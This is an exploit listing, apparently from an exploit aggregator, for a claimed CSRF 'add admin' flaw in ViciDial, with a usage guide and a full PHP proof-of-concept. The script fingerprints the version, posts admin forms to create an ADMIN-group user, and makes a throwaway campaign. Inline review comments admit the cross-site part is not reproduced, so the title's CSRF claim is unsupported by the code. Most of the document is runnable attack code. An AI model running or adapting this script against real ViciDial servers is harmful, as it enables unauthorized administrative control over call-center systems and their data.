## https://sploitus.com/exploit?id=PACKETSTORM:181984
=============================================================================================================================================  
| # Title : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or another search engine (no specific dork is given in this advisory).  
  
[+] The following PHP code submits the "add user" form of admin.php (ADD=4A, user_group ADMIN) to create an admin account. Note that the script itself authenticates with valid admin credentials over HTTP Basic; the CSRF angle in the title presumably means the same form can be submitted from a page a logged-in admin visits, but the script only shows the request parameters and does not reproduce that cross-site trigger.  
  
[+] Set your target in the usage line near the end of the script (line 172 of the file as published): $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); — the arguments are the admin login, its password and the base URL of the ViciDial web root. With a plain http:// URL the credentials travel unencrypted.  
  
[+] Save the code as poc.php.  
  
[+] Usage (from a shell): php poc.php  
  
[+] PayLoad :  
  
  
<?php  
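/**
 * PoC harness for the ViciDial "add admin" form (vicidial/admin.php, ADD=4A).
 *
 * Every request carries an HTTP Basic Authorization header built from the
 * supplied username/password, so this class drives the admin forms as an
 * already-authenticated user. NOTE(review): the advisory title says CSRF, but
 * the cross-site part (a victim admin's browser submitting the same ADD=4A
 * form without an anti-CSRF token check) is not reproduced here; the class
 * only shows which parameters such a forged request would need to carry.
 *
 * Several steps of exploit() (startService, updateSystemSettings,
 * fetchPhoneCredentials, agentPortalAuthentication, insertMaliciousRecording,
 * waitForCronJob) were empty stubs in the published PoC and are kept as no-ops.
 *
 * Fixes over the published listing:
 *  - the Authorization header is sent as "Name: value" (implode() over the
 *    associative header array dropped the header name);
 *  - the HTTP status code is parsed from the status line instead of comparing
 *    the string "HTTP/1.1 200 OK" against the integer 200 (never equal, so
 *    check() always returned 'Unknown' and authenticateAdmin() always threw);
 *  - parameters of GET requests go on the query string instead of into a
 *    request body;
 *  - extractVersion() returns "x.y-z" instead of the whole "VERSION: x.y-z"
 *    match, and keeps a trailing letter so "2.14-917a" compares equal to the
 *    vulnerable threshold rather than greater;
 *  - Faker\Generator (never required or bootstrapped, so a fatal error at
 *    runtime) is replaced by random_bytes()-based filler.
 */
class VICIdialExploit
{
    /** Newest version the PoC author treats as vulnerable (inclusive). */
    const VULNERABLE_MAX_VERSION = '2.14-917a';

    /** Seconds to wait for the target before a request is abandoned. */
    const REQUEST_TIMEOUT = 15;

    private $username;
    private $password;
    private $targetUri;
    /** @var array<string,string> header name => value, added to every request */
    private $headers;

    /**
     * @param string $username  ViciDial admin login used for HTTP Basic auth
     * @param string $password  its password (base64 is not encryption: it is
     *                          sent in clear unless $targetUri is https://)
     * @param string $targetUri scheme://host[:port] of the ViciDial web root;
     *                          a trailing slash is tolerated and stripped
     */
    public function __construct($username, $password, $targetUri)
    {
        $this->username  = (string) $username;
        $this->password  = (string) $password;
        $this->targetUri = rtrim((string) $targetUri, '/');
        $this->headers   = [
            'Authorization' => 'Basic ' . base64_encode($this->username . ':' . $this->password),
        ];
    }

    /**
     * Fingerprint the agent page (/agc/vicidial.php) and classify the target.
     *
     * @return string 'Vulnerable' when the extracted version is <= VULNERABLE_MAX_VERSION,
     *                'Safe' when it is newer, 'Unknown' when the page is not HTTP 200
     *                or carries no "VERSION: x.y-z" marker
     */
    public function check()
    {
        $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');
        if ($response['code'] !== 200) {
            return 'Unknown';
        }

        $version = $this->extractVersion($response['body']);
        if ($version === null) {
            return 'Unknown';
        }

        return $this->compareVersion($version, self::VULNERABLE_MAX_VERSION) <= 0 ? 'Vulnerable' : 'Safe';
    }

    /**
     * Pull "x.y-z[letter]" out of a page that prints "VERSION: x.y-z...".
     *
     * The optional trailing letter is kept because the threshold itself
     * ("2.14-917a") carries one; dropping it would make version_compare()
     * rank "2.14-917" above "2.14-917a".
     *
     * @param string $html page body
     * @return string|null the version string, or null when no marker is present
     */
    private function extractVersion($html)
    {
        if (!preg_match('/VERSION:\s*(\d+\.\d+)-(\d+[a-z]?)/', (string) $html, $matches)) {
            return null;
        }

        return $matches[1] . '-' . $matches[2];
    }

    /**
     * @param string $current    version found on the target
     * @param string $vulnerable reference version
     * @return int -1, 0 or 1 as version_compare() reports
     */
    private function compareVersion($current, $vulnerable)
    {
        return version_compare($current, $vulnerable);
    }

    /**
     * Run the full published sequence: authenticate, submit the add-user form,
     * create a throw-away campaign and list, then delete the campaign.
     * Steps that were stubs in the PoC are no-ops and are called for fidelity.
     *
     * @throws RuntimeException when authenticateAdmin() does not get HTTP 200
     */
    public function exploit()
    {
        $this->startService();
        $this->authenticateAdmin();
        $this->updateUserSettings();
        $this->updateSystemSettings();
        $campaign = $this->createDummyCampaign();
        $this->updateCampaignSettings($campaign['id']);
        $this->createDummyList($campaign['list_name'], $campaign['id']);
        $phone = $this->fetchPhoneCredentials();
        $this->agentPortalAuthentication($phone['extension'], $phone['password'], $campaign['id']);
        $this->insertMaliciousRecording($phone['recording_extension']);
        $this->deleteDummyCampaign($campaign['id']);
        $this->waitForCronJob();
    }

    /** Stub in the published PoC ("Starting HTTP service logic"); no-op. */
    private function startService()
    {
    }

    /**
     * Issue one HTTP request with the stored headers.
     *
     * GET parameters are appended to the query string; for any other method
     * they are form-encoded into the body with the matching Content-Type.
     * ignore_errors is set so 4xx/5xx responses still yield a body and a
     * status line instead of a warning and false.
     *
     * @param string     $method HTTP method, e.g. 'GET' or 'POST'
     * @param string     $url    absolute URL
     * @param array|null $body   form parameters, or null for none
     * @return array{code:int, body:string, headers:string[]} code is 0 when the
     *         connection itself failed (no status line available)
     */
    private function sendRequest($method, $url, $body = null)
    {
        $headerLines = [];
        foreach ($this->headers as $name => $value) {
            $headerLines[] = $name . ': ' . $value;
        }

        $options = [
            'http' => [
                'method'        => $method,
                'ignore_errors' => true,
                'timeout'       => self::REQUEST_TIMEOUT,
            ],
        ];

        if (is_array($body) && $body !== []) {
            $encoded = http_build_query($body);
            if ($method === 'GET') {
                $url .= (strpos($url, '?') === false ? '?' : '&') . $encoded;
            } else {
                $headerLines[] = 'Content-Type: application/x-www-form-urlencoded';
                $options['http']['content'] = $encoded;
            }
        }
        $options['http']['header'] = implode("\r\n", $headerLines);

        $context = stream_context_create($options);
        $result  = file_get_contents($url, false, $context);

        // $http_response_header is populated by file_get_contents() in this
        // scope only when a response was received.
        $responseHeaders = isset($http_response_header) ? $http_response_header : [];
        $code = 0;
        if (isset($responseHeaders[0]) && preg_match('#^HTTP/\S+\s+(\d{3})#', $responseHeaders[0], $m)) {
            $code = (int) $m[1];
        }

        return [
            'code'    => $code,
            'body'    => $result === false ? '' : $result,
            'headers' => $responseHeaders,
        ];
    }

    /**
     * Request admin.php?ADD=3&user=<username> with the Basic credentials.
     *
     * NOTE(review): HTTP 200 only proves the server answered; admin.php may
     * well return 200 with an authentication-failure page, so inspect the
     * body if a later step behaves unexpectedly.
     *
     * @throws RuntimeException when the status is not 200
     */
    private function authenticateAdmin()
    {
        $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', [
            'ADD'  => '3',
            'user' => $this->username,
        ]);
        if ($response['code'] !== 200) {
            throw new RuntimeException(sprintf(
                'Failed to authenticate with credentials (HTTP %d).',
                $response['code']
            ));
        }
        echo 'Authenticated successfully as user ', $this->username, PHP_EOL;
    }

    /**
     * Submit the add-user form (ADD=4A) with user_group ADMIN.
     *
     * NOTE(review): the published PoC posts the same user/pass it
     * authenticates with; to create a *new* admin you would presumably pass a
     * distinct login and password here — verify against admin.php's ADD=4A
     * handler. The response is not checked, as in the original.
     */
    private function updateUserSettings()
    {
        $filler = $this->randomToken(6);
        $userSettings = [
            'ADD'                => '4A',
            'user'               => $this->username,
            'pass'               => $this->password,
            'full_name'          => 'PoC ' . $filler,
            'user_group'         => 'ADMIN',
            'phone_login'        => 'poc' . $filler,
            'phone_pass'         => $this->randomToken(12),
            'active'             => 'Y',
            'vicidial_recording' => '1',
        ];
        $response = $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);
        echo 'Updated user settings (HTTP ', $response['code'], ')', PHP_EOL;
    }

    /** Stub in the published PoC ("Fetching system settings logic"); no-op. */
    private function updateSystemSettings()
    {
    }

    /**
     * Create a throw-away campaign (ADD=21) with a random six-digit id.
     *
     * @return array{name:string, id:int, list_name:string, list_id:int}
     */
    private function createDummyCampaign()
    {
        $campaignId   = random_int(100000, 999999);
        $listId       = $campaignId + 1;
        $campaignName = 'PoC Campaign ' . $this->randomToken(6);

        $campaignSettings = [
            'ADD'           => '21',
            'campaign_id'   => $campaignId,
            'campaign_name' => $campaignName,
            'user_group'    => '---ALL---',
            'active'        => 'Y',
        ];
        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);
        echo 'Created dummy campaign ', $campaignName, PHP_EOL;

        return [
            'name'      => $campaignName,
            'id'        => $campaignId,
            'list_name' => $campaignName . ' List',
            'list_id'   => $listId,
        ];
    }

    /**
     * Modify the campaign (ADD=41): active, auto_dial_level 1.
     *
     * @param int $campaignId id returned by createDummyCampaign()
     */
    private function updateCampaignSettings($campaignId)
    {
        $campaignSettings = [
            'ADD'             => '41',
            'campaign_id'     => $campaignId,
            'active'          => 'Y',
            'auto_dial_level' => '1',
        ];
        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);
        echo 'Updated dummy campaign settings', PHP_EOL;
    }

    /**
     * Create a list (ADD=211) attached to the campaign.
     *
     * @param string $listName   display name of the list
     * @param int    $campaignId owning campaign
     */
    private function createDummyList($listName, $campaignId)
    {
        $listSettings = [
            'ADD'         => '211',
            'list_name'   => $listName,
            'campaign_id' => $campaignId,
            'active'      => 'Y',
        ];
        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);
        echo 'Created dummy list ', $listName, PHP_EOL;
    }

    /**
     * Stub in the published PoC; the lookup was never implemented.
     *
     * @return array{extension:null, password:null, recording_extension:null}
     *         the keys exploit() reads, all null, so the stub does not trigger
     *         undefined-index notices
     */
    private function fetchPhoneCredentials()
    {
        return ['extension' => null, 'password' => null, 'recording_extension' => null];
    }

    /** Stub in the published PoC ("Agent portal authentication logic"); no-op. */
    private function agentPortalAuthentication($extension, $password, $campaignId)
    {
    }

    /** Stub in the published PoC ("Inserting malicious recording logic"); no-op. */
    private function insertMaliciousRecording($recordingExtension)
    {
    }

    /**
     * Delete the throw-away campaign (ADD=61, CoNfIrM=YES) via GET.
     *
     * @param int $campaignId id returned by createDummyCampaign()
     */
    private function deleteDummyCampaign($campaignId)
    {
        $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', [
            'ADD'         => '61',
            'campaign_id' => $campaignId,
            'CoNfIrM'     => 'YES',
        ]);
        echo 'Deleted dummy campaign ', $campaignId, PHP_EOL;
    }

    /** Stub in the published PoC ("Waiting for cron job logic"); no-op. */
    private function waitForCronJob()
    {
    }

    /**
     * Lower-case hex filler of exactly $length characters from random_bytes().
     * Replaces the Faker calls of the published PoC for names/logins/passwords.
     *
     * @param int $length number of characters wanted (>= 1)
     * @return string
     */
    private function randomToken($length)
    {
        $length = max(1, (int) $length);

        return substr(bin2hex(random_bytes((int) ceil($length / 2))), 0, $length);
    }
}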
  
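// Usage example: set the target here, or pass login, password and base URL as
// CLI arguments (php poc.php admin password http://127.0.0.1). The defaults
// below are the ones the advisory ships with.
$exploit = new VICIdialExploit(
    isset($argv[1]) ? $argv[1] : 'admin',
    isset($argv[2]) ? $argv[2] : 'password',
    isset($argv[3]) ? $argv[3] : 'http://127.0.0.1'
);

// The published PoC discarded check()'s verdict and ran exploit() regardless;
// stop on 'Safe' so a patched target is not hit with the admin forms.
// 'Unknown' (no version marker found) still proceeds, as the original did.
$verdict = $exploit->check();
echo 'Target check: ', $verdict, PHP_EOL;
if ($verdict === 'Safe') {
    exit(1);
}
$exploit->exploit();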
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================